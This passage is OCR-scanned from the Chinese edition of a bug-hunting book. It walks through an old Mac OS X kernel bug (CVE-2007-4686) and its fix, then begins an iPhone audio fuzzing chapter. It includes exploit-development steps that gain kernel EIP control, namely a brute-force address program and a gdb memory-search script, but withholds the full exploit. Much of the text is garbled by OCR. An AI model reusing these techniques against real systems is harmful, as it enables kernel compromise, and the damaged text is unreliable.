Veuillez redémarrer votre ordinateur. Maintenez la touche 


de démarrage enfoncée pendant plusieurs secondes ou bien 


appuyez sur le bouton de reinitialisation. 


Sie müssen Ihren Computer neu starten. Halten Sie dazu 
die Einschalttaste einige Sekunden gedrückt oder drücken 
Sie die Neustart-Taste. 


Iya- tt Any SPSVSVET. MO-KhIVE 
enMmmLegems. UEY KRAVET j E 


K| 7-2 Mac OS X 内 核 错 误 信息 





mi^, "n 7-2 所 示 。 


发 生 这 样 的 内 核 错 误 时 ， 系 统 会 把 月 溃 的 详细 信息 添加 到 文件 夹 /LibraryYLogs/ 


下 的 日 志文 件 中 。 重启 系统 , 打开 那个 日 志文 件 。 


osx$ cat /Library/Logs/panic.log 
Sat Mar 3 13:30:58 2007 


panic(cpu O caller 0x001A31CE): Unresolved kernel trap (CPU O, Type 14-page fault), 


registers: 


CRO: 0x80010033, CR2: 0xe0456860, CR3: Ox00d8a000, CR4: 0x000006e0 
EAX: Oxe0000000, EBX: Oxffo000000, ECX: 0x04000001, EDX: 0x0386c380 
CR2: 0xe0456860, EBP: 0x250e3d18, ESI: Ox042fbeO4, EDI: 0x00000000 


CElLe Nyvnnn1inrIe7 CTD. NvNNICCIAr CC. mm nnnno nc. ANARAN 


LI Le VAUVUULIUVZO/, CIF > YVAYUYDIIIGL, Use VAVUUUULVUUO, Vo. 0x00400010 


Backtrace, Format - Frame : Return Address (4 potential args on stack) 


0x250e3a68 : 0x128d08 (0x3c9a14 0x250e3a8c Ox131de5 0x0) 
0x250e3aa8 : Ox1a31ce (Ox3cf6c8 0x0 Oxe Ox3ceef8) 

0x250e3bb8 : 0x19a874 (0x250e3bdO 0x1 OxO 0x42fbe04) 
0x250e3d18 : Ox356efe (0x42fbe04 0x8004741b 0x250e3eb8 0x3) 
0x250e3d68 : Oxief4de (0x4000001 0x8004741b 0x250e3eb8 0x3) 
0x250e3da8 : 0x1e6360 (0x250e3dd0 0x297 0x250e3e08 0x402a1f4) 
0x250e3e08 : Oxide161 (0x3a88084 0x8004741b 0x250e3eb8 0x3) 


0x250e3e58 : 0x330735 (0x4050440 
7K ak 2K 2K KKK OK 
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Too WF ER B6 VA — T 3EREBSUH P IJ EH ZR SERES. RET EAE OS X 内 
核 的 特权 上 下 文 (privileged context ) 中 执行 任意 代码 吗 ? 要 回答 这 个 问题 ， 必 须 
查看 一 下 内 核 的 内 部 运作 。 








7.2.2 第 二 步 : 准备 一 个 内 核 调 试 的 环境 


这 时 ， 我 需要 调试 内 核 了 。 之 前 提 到 ， 如 果 有 两 台 Mac， 这 不 是 问题 。 但 我 
手边 只 有 一 台 MacBook， 因 此 必须 找到 其 他 方法 调试 内 核 。 问 题 是 这 样 解决 的 : 
在 一 台 Linux 主机 上 构建 并 安装 苹果 的 GNU 调试 希 ， 然 后 将 它 连接 到 我 的 
MacBook. B.5 节 给 出 了 构建 这 样 一 套 调 试 锅 主机 系统 的 指令 。 











7.2.3 Biv: 连接 调试 器 和 目标 系统 


在 Linux 主机 上 构建 苹果 的 gdb 之 后 ， 我 用 以 太 网 交 义 线 连接 两 个 系统 ， 如 
图 7-3 所 示 。 





Mac OS X Linux 
CB titu? Cht P 





IPttht+ : 10.0.0.2 


1P 地 址 : .0.0.3 
MAC 地 址 : OO:17:F2:f0:47:149 tik : 10.0.0 


图 7-3 “远程 调试 Mac OS X 内 核 的 装备 
然后 打开 Mac OS X 目标 系统 ， 启 用 和 远程 内 核 调试 ,重启 系统 使 改动 生效 。 


osx$ sudo nvram boot-args="debug=0x14e" 


osx$ sudo reboot 


Mac OS X 目标 系统 重 忆 后， 局 动 Linux 主机 ， 确 信 它 可 以 连接 到 目标 系统 。 


linux$ ping -c1 10.0.0.2 
PING 10.0.0.2 (10.0.0.2) from 10.0.0.3 : 56(84) bytes of data. 
64 bytes from 10.0.0.2: icmp seq-1 ttl-64 time-1.08 ms 


--- 10.0.0.2 ping statistics --- 
1 packets transmitted, 1 received, OX loss, time Oms 
rtt min/avg/max/mdev - 1.082/1.082/1.082/0.000 ms 
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我 在 Linux 系统 上 为 日 标 系统 增加 了 一 项 永久 的 ARP Z& H , MEM eps 
间 建 立 起 一 个 稳定 的 连接 ， 确 保 调试 目标 机 各 的 内 核 时 连接 不 会 中 汤 。 


linux$ su - 
Password: 





linux# arp -an 
? (10.0.0.1) at 00:24:E8:A8:64:DA [ether] on etho 
? (10.0.0.2) at 00:17:F2:F0:47:19 [ether] on etho 


linux# arp -s 10.0.0.2 00:17:F2:F0:47:19 


linux# arp -an 
? (10.0.0.1) at 00:24:E8:A8:64:DA [ether] on etho 
? (10.0.0.2) at 00:17:F2:F0:47:19 [ether] PERM on etho 


然后 以 一 个 非特 权 用 户 身 份 登录 到 Mac OSX 系 统 ， 按 一 下 系统 的 电源 按键 ， 
产生 一 个 不 可 屏蔽 中 断 (NMI )， 在 MacBook 的 屏幕 上 输出 以 下 信息 。 


Debugger called: «Button SCI> 

Debugger called: «Button SCI» 

cpu interrupt: sending enter debugger signal (00000002) to cpu 1 
ethernet MAC address: 00:17:f2:f0:47:19 

ethernet MAC address: 00:17:f2:f0:47:19 

ip address: 10.0.0.2 

ip address: 10.0.0.2 





Waiting for remote debugger connection. 


回 到 Linux xEBL, is fTVA Sas (关于 如 何 构建 这 个 gdb 版 本 的 更 多 信息 ， 
见 B.S 节 )。 





linux# gdb osx KernelDebugKit 10.4.8/mach kernel 

GNU gdb 2003-01-28-cvs (Mon Mar 5 16:54:25 UTC 2007) 

Copyright 2003 Free Software Foundation, Inc. 

GDB is free software, covered by the GNU General Public License, and you are 
welcome to change it and/or distribute copies of it under certain conditions. 
Type "show copying" to see the conditions. 

There is absolutely no warranty for GDB. Type "show warranty" for details. 
This GDB was configured as "--host- --target-i386-apple-darwin". 


EA Jedi zs bos E HIS AR B AY Va C kdp )。 
(gdb) target remote-kdp 


Js dest pn. BREEN EL ASA 


(gdb) attach 10.0.0.2 

Connected. 

0x001a8733 in lapic dump () at /SourceCache/xnu/xnu-792.13.8/0sfmk/1i386/mp.c:332 
332 int i; 
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如 调试 带 输 出 所 示 ,， 它 看 上 去 可 以 工作 ! ik HH. OS X 系统 被 锁定 了 ,于 
是 我 用 以 下 调试 命令 继续 执行 内 核 。 


(gdb) continue 
Continuing. 


现在 ， 远 程 调试 Mac OS X 目标 系统 所 需 的 一 切 都 准备 就 绪 了 。 


7.2.4 ”第 四 步 : 控制 EIP 


成 功 把 调试 需 连 接 到 目标 系统 的 内 核 之 后 ， 我 在 Mac OS X 机 大 上 打开 一 个 
终端 ， 然 后 再 次 执行 代码 清单 7-2 中 的 POC 代码 。 


osx$ id 
uid=502(seraph) gid-502(seraph) groups=502(seraph) 


osx$ ./poc 
OSX 系 统 立 即 锁定 ， 在 Linux 主机 上 得 到 了 以 下 调试 硕 输 出 信息 。 


Program received signal SIGTRAP, Trace/breakpoint trap. 

0x0035574c in ttsetcompat (tp=0x37e0804, com-0x8004741b, data-0x2522beb8 "", 一 
term-0x3) at /SourceCache/xnu/xnu-792.13.8/bsd/kern/tty compat.c:145 

145 S 


为 了 和 弄 明白 究竟 是 什么 引发 了 SIORAP 信和 号， 我 查看 了 最 后 执行 的 内 核 指令 
(以 下 调试 命令 的 详细 描述 见 B.4 节 ) 


(gdb) x/1i $eip 
0x35574c <ttsetcompat+138>: call —*0x456860(Xeax) 


显然 ， 当 内 核 试图 调用 EAX ap Aedes LAYS AE Y Hoi. Be ROR ADA ay 
Ff ar Eo 











(gdb) info registers 


eax 0xe0000000 - 536870912 
ecx 0x4000001 67108865 
edx 0x386c380 59163520 
ebx Oxffo000000 -16777216 
esp 0x2522bc18 0x2522bc18 
ebp 0x2522bd18 0x2522bd18 
esi 0x37e0804 58591236 
edi 0x0 0 

eip 0x35574c 0x35574c 
eflags 0x10287 66183 

CS 0x8 8 


SS 0x10 16 
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ds Ox4b0010 4915216 
es 0x340010 3407888 
fs 0x25220010 622985232 
gs 0x48 72 


调试 器 的 输出 显示 EAX 寄存 器 的 值 是 oxeooo0000。 我 并 不 清楚 这 个 值 是 从 哪里 
来 的 ， 因 此 我 反 汇 编 了 EIP 附近 的 指令 。 


(gdb) x/6i $eip - 15 +f pg k 
0x35573d <ttsetcompat+123>: mov %ebx ,%eax - Ee Be ATAT MHS 
0x35573f <ttsetcompat+125>: shl $0x5,%eax aC dm «x89. 

0x355742 <ttsetcompat+128>: mov %eSi,0x4(%esp,1) 

0x355746 <ttsetcompat+132>: mov oxtfffffa8(%ebp) ,%ecx 

0x355749 <ttsetcompat+135>: mov %ecx, (esp, 1) 

0x35574c <ttsetcompat+138>: call *0x456860(%eax) 


在 地 址 0x35573d Xb, EBX STE ae BJ E lA EAX 寄存 项 。 下 一 条 指令 把 这 个 值 
左 移 $ 位 。 地 址 ox35574c 处 使 用 这 个 值 来 计算 call 指令 的 操作 数 。 那 么 EBX 的 值 
是 从 哪里 来 的 呢 ? 快速 查看 一 下 这 些 寄 存 需 信 可 以 发 现 ，EBX 的 值 是 oxffoooooo, 
是 我 原先 作为 TIOCSETD IOCTL 的 输入 数据 提供 的 。 值 0xe0000000 是 把 我 提供 的 输 
入 值 左 移 $ 位 得 到 的 结果 。 如 我 预料 ， 用 来 得 到 EIP 寄存 需 新 值 的 内 存 位 置 是 可 
以 控制 的 。 对 我 所 提供 的 输入 数据 的 改动 可 以 表示 如 下 。 


address of the new value for EIP = (IOCTL input data value «« 5) + 0x456860 


为 特定 的 内 存 地 址 赋予 合适 的 TIOCSETD 输入 数据 ， 可 以 用 以 下 两 种 方式 中 的 
任何 一 种 : 可 以 尝试 解决 一 个 数学 问题 ， 或 者 可 以 暴力 得 到 这 个 值 。 我 决定 选 一 
个 简单 的 方法 ， 于 是 写 了 如 下 程序 来 暴力 得 到 这 个 值 。 





代码 清单 7-3. 287] 138 TIOCSETD 输入 数据 值 的 代码 (addr brute force.c ) 


01 #include <stdio.h> 


02 

03 #define MEMLOC 0x10203040 
04 #define SEARCH START 0x80000000 
05 #define SEARCH END Oxffffffff 
06 

07 int 

08 main (void) 

09 { 

10 unsigned int as b = 0; 

11 

12 for (a = SEARCH_START; a < SEARCH_END; a++) { 
13 b = (a << 5) + 0x456860; 

14 if (b == MEMLOC) { 


15 printf ("Value: %08x\n", a); 
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16 return 0; 
18 } 
20 printf ("No valid value found. Tn"); 


22 return 1; 


我 写 这 个 程序 来 回答 这 个 问题 : 要 把 内 存 地 址 0x10203040 处 的 值 复制 到 EIP 
寄存 春 中 ， 需 要 给 内 核发 送 什 么 样 的 TIOCSETD 输入 数据 ? 


osx$ gcc -0 addr brute force addr brute force.c 
osx$ ./addr brute force 
Value: 807ed63f 


如 果 0x10203040 指向 我 希望 复制 给 EIP 的 值 ， 我 必须 把 数值 ox807ed63f 作为 
TIOCSETD IOCTL 的 输入 数据 传人 。 

然后 我 试图 修改 EIP, 让 它 指向 地 址 ox65656565。 为 此 , 我 要 在 内 核 中 找到 一 处 
指向 该 值 的 内 存 位 置 。 我 写 了 下 面 这 段 gdb 脚本 ， 以 便 找 到 合适 的 内 核 内 存 位 置 。 


代码 清单 7-4 一 上 段 在 内 核 中 寻找 指向 特 定子 广 模 式 内 存 位 置 的 脚本 


( search memloc.gdb ) 

















01 set $MAX ADDR - 0x00600000 


03 define my ascii 

04 if $argc != 1 

05 printf "ERROR: my ascii" 

06 else 

07 set $tmp = *(unsigned char *)($argo) 
08 if ($tmp « 0x20 || $tmp » Ox7E) 


09 printf "." 

10 else 

11 printf "%c", $tmp 

12 end 

13 end 

14 end 

15 

16 define my hex 

17 if $argc !- 1 

18 printf "ERROR: my hex" 

19 else 

20 printf "%02X%02X%02X%02X ", \ 

21 *(unsigned char*)($argo + 3), *(unsigned char*)($argo + 2), \ 
22 *(unsigned char*)($argo + 1), *(unsigned char*)($argo + O) 
23 end 

24 end 

25 


26 define hexdump 
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27 if $argc !- 2 

28 printf "ERROR: hexdump" 

29 else 

30 if ((*(unsigned char*)($argo + 0) == (unsigned char)($argi >> 0))) 
31 if ((*(unsigned char*)($argo + 1) == (unsigned char)($arg1 >> 8))) 
32 if ((*(unsigned char*)($argO + 2) == (unsigned char)($argi >> 16))) 
33 if ((*(unsigned char*)($argo + 3) == (unsigned char)($arg1 >> 24))) 
34 printf "408X : ", $argo 

35 my hex $argo 

36 my ascii $arg0+0x3 

37 my ascii $arg0+0x2 

38 my ascii $argO+0x1 

39 my ascii $arg0+0x0 

40 printf "Nn" 

41 end 

42 end 

43 end 

AL end 

45 end 

46 end 

47 

48 define search memloc 

49 set $max addr = $MAX ADDR 

50 set $counter = 0 

51 if $argc != 2 

52 help search memloc 

53 else 

54 while (($argo + $counter) <= $max addr) 

55 set $addr = $argO + $counter 

56 hexdump $addr $arg1 

57 set $counter = $counter + 0x20 

58 end 

59 end 

60 end 


61 document search memloc 

62 Search a kernel memory location that points to PATTERN. 
63 Usage: search memloc ADDRESS PATTERN 

64 ADDRESS - address to start the search 

65 PATTERN - pattern to search for 


66 end 





代码 清单 7-4 中 的 gdb 脚本 有 两 个 参数 : 搜索 的 起 始 地 址 和 要 搜索 的 模式 。 
我 要 寻找 指 回 值 ox65656565 的 内 存 位 置 ， 因 此 我 用 以 下 方式 使 用 这 个 脚本 。 


(gdb) source search memloc.gdb 
(gdb) search memloc 


0041BDAO : 


0041BDCO : 
0041BDEO : 
OO41BE00 : 
0041BE20 : 
0041BE40 : 
0041BE60 : 
: 65656565 


0041BE80 


65656565 
65656565 
65656565 
65656565 
65656565 
65656565 
65656565 


0x400000 0x65656565 
eeee 
eeee 
eeee 
eeee 
eeee 
eeee 
eeee 
eeee 
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0041BEAO : 65656565 eeee 
OO41BECO : 65656565 eeee 
00459A00 : 65656565 eeee 
00459A20 : 65656565 eeee 
00459A40 : 65656565 eeee 
00459A60 : 65656565 eeee 
00459A80 : 65656565 eeee 
00459AA0 : 65656565 eeee 
00459ACO : 65656565 eeee 
00459AEO : 65656565 eeee 
00459B00 : 65656565 eeee 
00459B20 : 65656565 eeee 
Cannot access memory at address 0x4dc000 





输出 显示 了 该 脚本 找到 的 指向 值 ox65656565 的 内 存 位 置 。 我 选 了 列表 里 的 第 
一 个 ， 调 整 了 代码 清单 7-3 中 第 三 行 定义 的 MEMLOC， 然 后 让 程序 决定 那个 合适 的 
TIOCSETD 输入 值 。 


osx$ head -3 addr brute force.c 
include <stdio.h> 


#define MEMLOC 0x0041bda0 
osx$ gcc -o addr brute force addr brute force.c 


osx$ ./addr brute force 
Value: 87ffe2aa 


然后 , 我 改变 代码 清单 7-2 的 POC (RAS IOCTL 输入 值 , 把 内 核 调试 器 连接 
到 OS X 上， 执行 这 段 代 码 。 


osx$ head -6 poc.c 
include «sys/ioctl.h» 


int 
main (void) 
f 
L 
unsigned long ldisc = 0x87ffe2aa; 
OSX$ gcc -0 poc poc.c 


osx$ ./poc 
OS X HLR E, Linux 3EBL E38 as HAS HA AH P o 


Program received signal SIGTRAP, Trace/breakpoint trap. 
0x65656565 in ?? () 


(gdb) info registers 
eax Oxfffc5540 -240320 


ecx 
edx 
ebx 
esp 
ebp 
esi 
edi 
eip 
eflags 
CS 

SS 

ds 

es 

fs 


gs 


0x4000001 
0x386c380 
0x87ffe2aa 
0x250dbco8 
0x250dbd18 
0x3e59604 
0x0 
0x65656565 
0x10282 
0x8 

0x10 
0x3e50010 
0x3e50010 
0x10 

0x48 


67108865 
59163520 

- 2013273430 
0x250dbc08 
0x250dbd18 
65377796 

0 


0x65656565 
66178 

8 

16 
65339408 
65339408 
16 

72 
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如 调试 机 输出 所 示 , 现在 EIP 寄存 带 的 值 是 0x65656565。 这 时 我 可 以 控制 EIP， 
但 是 利用 这 个 bug 以 实现 内 核 级 别 的 任意 代码 执行 仍 是 一 个 挑战 。 在 OS X 中 ， 
包括 Leopard, 内 核 并 没有 映射 到 每 一 个 用 户 空 间 进 程 当中 ; 它 有 目 己 的 虚拟 地 址 
空间 。 因 此 使 用 Linux 或 者 Windows 的 常用 策略 来 返回 到 用 户 空间 地 址 是 不 可 能 
的 。 我 通过 自己 的 权限 提升 数据 (payload) 和 对 此 数据 的 引用 ， 对 内 核实 施 堆 喷 
HF (heap spray )， 从 而 解决 了 这 个 问题 。 为 实现 这 点 ， 我 利用 了 0OSX 内 核 中 的 一 
处 内 存 泄漏 。 然 后 我 算出 了 一 个 合适 的 指 回 这 个 数据 (payload ) 引用 的 TIOCSETD 


输入 值 。 之 后 把 这 个 值 复制 到 EIP， 然 后 











给 大 家 提供 完整 的 、 可 工作 的 利用 程序 是 违法 的 ， 但 如 果 你 感 兴趣 ， 可 以 访 
问 本 书 的 网 站 ， 观 看 我 录制 的 一 个 演示 实际 漏洞 利用 程序 的 视频 片段 。 钙 


7.3 


漏洞 修正 














2007 年 中 月 /4 日 ， 星 期 三 





FGA SERA AI ZR, FRA RI STA Pee IOCTL 数据 新 增 了 一 项 检查 ， 
修复 了 区 bug O 


源 代码 文件 ”xnu-792.24.17/bsd/kern/tty.c P 


[..] 
1081 
1082 
1083 
1084 
1085 


case TIOCSETD: { 


/* set line discipline */ 


register int t = *(int *)data; 
dev t device = tp->t dev; 


if (t >= nlinesw || t « 0) 
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1086 return (ENXIO); 

1087 if (t != tp-»t line) { 

1088 s = spltty(); 

1089 (*linesw[tp-»t line].l close)(tp, flag); 
1090 error = (*linesw[t].1 open)(device, tp); 
1091 if (error) { 

1092 (void) (*linesw[tp->t_line].1 open)(device, tp); 
1093 splx(s); 

1094 return (error); 

1095 

1096 tp-»t line - t; 

1097 splx(s); 

1098 

1099 break; 

1100 } 


[ 


现在 第 1085 行 检查 t 的 值 是 否 为 负 。 如 果 为 负数 , 用户 提 供 的 数据 将 不 再 处 
理 。 这 个 细小 的 改动 足以 成 功 修复 这 个 漏洞 。 





7.4 ”经 验 和 教训 


作为 一 名 程序 员 : 
O 在 可 能 的 情况 下 ， 避 免 使 用 显 式 类 型 转换 ; 
O 务必 对 输入 数据 进行 验证 。 


7.5 补充 


2007 lE I1 EB i5 EJ, EHD 


因为 这 个 漏洞 已 修复 ，OS X 的 XNU 内 核 新 版 本 已 可 以 获得 ， 所 以 今天 我 在 
自己 的 网 站 上 发 布 了 一 份 详细 的 安全 报告 "。 这 个 bug 的 编号 是 CVE-2007-4686。 
在 我 发 表 了 这 篇 报告 后 ，Theo de Raadt ( OpenBSD 和 OpenSSH 的 创立 者 ) 
曾 提 及 这 个 bug 比 4.4BSD 还 要 老 , 并 且 在 大 约 15 年 前 ,大 家 都 已 经 修复 了 ,只 
有 苹果 公司 不 知道 。 在 1994 年 的 FreeBSD 初始 版 本 中 ，TIOCSETD IOCTL 的 实现 
是 这 样 的 。” 





[..] 

804 case TIOCSETD: { /* set line discipline */ 
805 register int t = *(int *)data; 

806 dev t device = tp->t dev; 
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808 if ((u_int)t >= nlinesw) 

809 return (ENXIO); 

810 if (t != tp-»t line) { 

811 s = spltty(); 

812 (*linesw[tp-»t line].1 close)(tp, flag); 
813 error = (*linesw[t].1 open)(device, tp); 
814 if (error) { 

815 (void)(*linesw[tp-»t line].l open)(device, tp); 
816 splx(s); 

817 return (error); 

818 

819 tp->t_line = t; 

820 splx(s); 

821 } 

822 break; 

823 


第 808 行 代码 将 tt 的 类 型 显 式 转换 为 无 符号 整 型 , 因此 tt 永远 不 会 是 负数 。 如 
果 用 户 提 供 的 数据 大 于 0x8o000000， 困 数 返 回 错误 (DLS 809 行 )。 所 以 Theo 是 

















对 的 一 一 这 个 bug 早 在 1994 EWER T -o Al 7-4 显示 了 这 个 bug 修复 的 时 间 表 。 
£9 2838 
F Z buo T 
Seana i : 
em / $9284 irum d sm 
| iA shy Tal 43. E 我 发 布 安全 报告 
03.19.2007 03.26.2007 04.06.2007 11.14.2007 11.15.2007 
图 7-4 ”从 通知 苹果 公司 到 我 发 布 安全 报告 的 时 间 表 
附注 


[1] XNU 有 漏洞 的 版 本 792.13.8 源 代 码 可 从 以 下 网 址 下 载 : http://www.opensource.apple.com/ 
tarballs/xnu/xnu-792.13.8.tar.gz ( 短 址 为 http://bit.ly/HUs63y ). 

[2] JL "'You need to restart your computer’ (kernel panic) message appears (Mac OS X v10.5, 
10.6)": http://support.apple.com/kb/TS3742 ( 短 址 为 http://bit.ly/HUnde4 )。 

[3] JL Mac OS X Developer Library HJ “Kernel Extension Programming Topic: Debugging a Kernel 
Extension with GDB”, [jd 7j http://developer.apple.com/library/mac/#documentation/Darwin/ 
Conceptual/KEXTConcept/KEXTConceptDebugger/debug tutorial.html ( 短 址 为 http://bit.ly/ 
HUsOOJ ), "Kernel Programming Guide: When Things Go Wrong; Debugging the Kernel", W] 
址 为 http://developer.apple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/ 
build/ build.html#//apple_ref/doc/uid/TP30000905-CH221-CIHBJCGC ( 短 址 为 http://bit.ly/IzrwgL ). 

[4] JL http://www.trapkit.de/books/bhd/ ( 短 址 为 http://bit.ly/yZX6td )。 
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XNU 的 版 本 7792.24.17 源 代码 可 从 以 下 网 址 下 载 : http://www.opensource.apple.com/tarballs/ 
xnu/xnu-792.24.17.tar.gz ( 短 址 为 http://bit.ly/HGIANT )。 

描述 这 个 Mac OS X 内 核 漏 洞 的 安全 报告 可 从 以 下 网 址 得 到 : http://www.trapkit.de/advisories/ 
TKADV2007-001.txt ( 短 址 为 http://bit.ly/ITGObP )。 

1994 年 FreeBSD 初始 版 本 的 tty.c 可 从 以 下 网 址 得 到 : http://www.freebsd.org/cgi/cvsweb.cgi/ 
src/sys/kern/tty.c?rev-1.1;content-type-text/plain ( 短 址 为 http://bit.ly/HUo8Ly )。 
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REAR 


2000 年 3 月 2/1 日， 星期 六 


上 周 好 友 借 给 我 一 台 越 狱 由 过 的 第 一 代 iPhone， 我 很 兴奋 。 自 从 苹果 公司 预 
告 了 iPhone， 我 就 想 试 试看 能 否 在 这 个 设备 里 找到 bug, 但 是 上 周 之 前 我 一 人 台 都 
没 碰 过 。 


8.1 AMT 


终于 ,我 有 了 一 台 iPhone 可 以 把 玩 ， 我 想 找 找 bug。 但 是 从 哪儿 开始 呢 ? 我 
先 列 了 一 张 清单 ， 把 已 安装 的 应 用 和 库 中 看 起 来 最 可 能 含有 bug 的 都 列 了 出 来 。 
移动 版 Safari 浏览 希 、 移 动 版 Mail 应 用 和 音频 库 排 在 列表 的 前 几 位 。 我 觉得 音频 
库 是 最 有 希望 的 目标 ， 因 为 这 些 库 要 做 大 量 解 析 工 作 ， 并 且 在 手机 上 广泛 使 用 ， 
因此 我 打算 先 在 它们 里 上 试 试 运气 。 

查找 iPhone 音频 库 bug 的 步骤 如 下 。 

口 第 一 步 : 研究 iPhone 的 音频 性 能 。 以 下 步骤 中 我 使 用 的 平 

D 第 二 步 : 创建 一 个 简单 的 模糊 测试 程序 对 — 6g d — e iphone, 固件 版 

这 个 手机 进行 模糊 测试 。 iod 














CS5HII» 。 
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注意 我 通过 Cydia | 在 iPhone 上 安装 了 所 有 必需 的 工具 ， 辟 如 Bash, OpenSSH 
以 及 GNU 调试 器 。 


8.1.1 第 一 步 : 研究 iPhone 的 音频 性 能 


脱胎 于 iPod 的 iPhone， 是 一 于 拥有 强大 首 频 功 能 的 设备 。 手 机 上 三 个 现成 的 
框架 提供 了 不 同 级 别 的 声音 功能 : Core Audio 框架 中，Celestial 框架 和 Audio 
Toolbox HEA, Ah, iPhone 运行 一 个 音频 守护 进程 mediaserverd， 这 个 进程 收 
集 所 有 应 用 的 声音 输 出 ， 并 且 管 理 诸如 首 量 和 铃声 开关 变化 这 样 的 事件 。 




















8.1.2 第 二 步 : 创建 一 个 简单 的 模糊 测试 程序 对 这 个 手机 进行 模糊 测试 


iPhone 不 同 框架 的 音频 系统 看 上 去 有 点 复杂 ， 因 此 我 决定 创建 一 个 简单 的 模 
糊 测试 程序 ， 从 搜寻 明显 的 bug 开始 。 这 个 模糊 测试 程序 完成 以 下 操作 。 

(1) Æ Linux 主机 上 : 通过 改动 一 个 目标 样 例文 件 准备 测试 用 例 。 

(2) 在 Linux 主机 上 : 通过 一 个 Web 服务 大 伺服 这 些 测试 用 例 。 

(3) 在 iPhone E: 在 移动 版 Safari 中 打开 这 些 测试 用 例 。 

(4) 在 iPhone E: HEZE mediaserverd 的 出 错 状况 。 

(5) 在 iPhone E: 发 现 错误 事件 时 记录 结 

(6) 重复 以 上 步骤 。 

我 在 Linux 主机 上 创建 了 下 面 这 个 简单 的 、 基 于 文件 改动 的 模糊 测试 程序 来 
准备 测试 用 例 。 


代码 清单 8-1 在 Linux 主机 上 写 的 准备 测试 用 例 的 代码 〈 名 zz.c ) 


01 #include <stdio.h> 

02 #include <sys/types.h> 
03 #include <sys/mman.h> 
04 #include «fcntl.h» 

05 #include <stdlib.h> 

06 #include <unistd.h> 

07 


08 int 

09 main (int argc, char *argv[]) 

10 

11 int fd =; 

12 char * p = NULL; 
13 char * name = NULL; 
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unsigned int file size = 0; 
unsigned int file offset - 0; 
unsigned int file value - 0; 


if (argc « 2) 1 
printf ("[-] Error: not enough arguments Wn"); 
return (1); 


} else { 
file size = atol (argv[1]); 
file offset = atol (argv[2]); 
file value = atol (argv[3]); 
name = argv[4]; 


// open file 
fd = open (name, O RDWR); 
if (fd < 0) 4 

perror ("open"); 

exit (1); 


// mmap file 
p = mmap (0, file size, PROT READ | PROT WRITE, MAP SHARED, fd, 0); 
if ((int) p == -1) { 

perror ("mmap"); 

close (fd); 

exit (1); 


// mutate file 

printf ("[+] file offset: Ox%08x (value: Ox%08x)\n", file offset, file value); 
fflush (stdout); 

p[ file offset] = file value; 


close (fd); 
munmap (p, file size); 


return (0); 


代码 清单 8-1 的 模糊 测试 程序 接收 4 个 参数 : 目标 样 例文 件 的 大 小 、 文 件 修 
改 处 的 侦 移 量 、 与 到 文件 侯 移 位 置 处 的 单字 节 值 以 及 目标 文件 的 文件 名 。 写 完 模 
糊 测 试 程序 后 把 它 编 详 一 下 。 


linux$ gcc -o fuzz fuzz.c 


然后 我 开始 模糊 测试 AAC (Advanced Audio Coding P!) 格式 的 文件 ， 这 是 


iPhone 上 使 用 的 默认 音频 格式 。 我 选择 iPhone 的 标准 铃 音 Alarm.m4r 作为 目标 样 
例文 件 。 


linux$ cp Alarm.m4r testcase.m4r 
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在 终端 输入 以 下 命令 行 ， 得 到 测试 用 例文 件 的 大 小 。 


linux$ du -b testcase.m4r 
415959 testcase.m4r 


下 面 的 命令 行 选 项 指示 fuzz 程序 用 oxff ( 十进制 255 ) 蔡 换 文件 中 偏 移 位 置 
为 4 的 字 节 。 


linux$ ./fuzz 415959 4 255 testcase.m4r 
[+] file offset: 0x00000004 (value: Ox000000ff) 


然后 用 xxd 验证 结果 。 


linux$ xxd Alarm.m4r | head -1 


0000000: 0000 0020 6674 7970 4d34 4120 0000 0000 ... ftypM4A .... 


linux$ xxd testcase.m4r | head -1 


0000000: 0000 0020 ff74 7970 4d34 4120 0000 0000 ... .typM4A .... 


fag EH TN XC f D ELO 4. C OCTPARER A, 0 开始 计数 ) 的 值 被 预期 
替换 。 接 下 来 ， 我 创建 了 一 个 bash 脚本 来 自动 完成 文件 的 改动 。 








代码 清单 8-2” 目 动 改 动 文件 的 bash 脚本 ( go.sh ) 


it! /bin/bash 


# file size 
filesize-415959 


# file offset 
off=0 


# number of files 
num=4 


# fuzz value 
val=255 


# name counter 
cnt=0 


while | $cnt -lt $num | 


do 
cp ./Alarm.m4r ./file$cnt.m4a 
„/ fuzz ee $off $val ./file$cnt.m4a 
let "off+=1 
let "cnt+=1" 
done 


{EL ( oxf Ff ) 





这 个 脚本 就 是 把 代码 清单 8-1 中 所 示 模 糊 测试 程序 包装 了 一 下 后 生成 的 ， 
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目 动 生成 日 标 文件 Alarm.m4r 的 4 个 测试 用 例 CULES 20 行 ) 从 文件 俩 移 位 置 0 
开始 〈 见 第 7 行 )， 目 标 文 件 的 前 4 个 字 节 《〈 见 第 1017) 分 别 被 替换 为 oxff( 见 
第 13 行 ) 执行 后 ， 脚 本 产生 以 下 输出 。 


linux$ ./go.sh 

[+] file offset: 0x00000000 (value: Ox000000ff) 
[+] file offset: 0x00000001 (value: Ox000000ff) 
[+] file offset: 0x00000002 (value: Ox000000ff) 
[+] file offset: 0x00000003 (value: Ox000000ff) 


然后 验证 生成 的 测试 用 例 。 


linux$ xxd fileo.m4a | head -1 
0000000: ffoo 0020 6674 7970 4434 4120 0000 0000 ... ftypM4A ee 


linux$ xxd file1.m4a | head -1 
0000000: ooff 0020 6674 7970 4d34 4120 0000 0000 ... ftypM4A Pss 


linux$ xxd file2.m4a | head -1 
0000000: 0000 ff20 6674 7970 4d34 4120 0000 0000 ... ftypM4A —— 


linux$ xxd file3.m4a | head -1 
0000000: 0000 ooff 6674 7970 4d34 4120 0000 0000 ....ftypM4A .... 


如 输出 所 示 ， 模 糊 测 试 程序 运行 后 修改 了 每 个 测试 用 例文 件 中 相应 位 置 的 字 

节 ， 跟 预期 一 臻 。 有 一 个 重要 事实 我 还 没有 提 到 ， 代 人 码 清 单 8-2 中 的 脚本 把 警告 
人 S 音 文件 的 扩展 名 由 .m4r 改 为 .m4a ( 见 第 20 行 ) 这 是 必要 的 ,因为 移动 版 Safari 
不 文 持 iPhone 手机 铃 首 使 用 的 .m4r 文件 扩展 名 。 

我 之 前 在 Linux 主机 上 安装 了 Web 服务 大 Apache, 现在 就 把 改动 过 和 没 改 过 
的 敬告 铃 首 文件 复制 到 其 网 站 根 目 录 下 。 把 未 改动 过 的 原始 敬告 铃 首 扩展 名 
从 .m4r 改 为 .m4a， 然 后 让 移动 版 Safari 指 问 它 的 URL, 

如 图 8-1 所 示 , 原 始 日 标 文 件 Alarm.m4a 在 手机 中 的 移动 版 Safari1 上 顺利 播放 。 
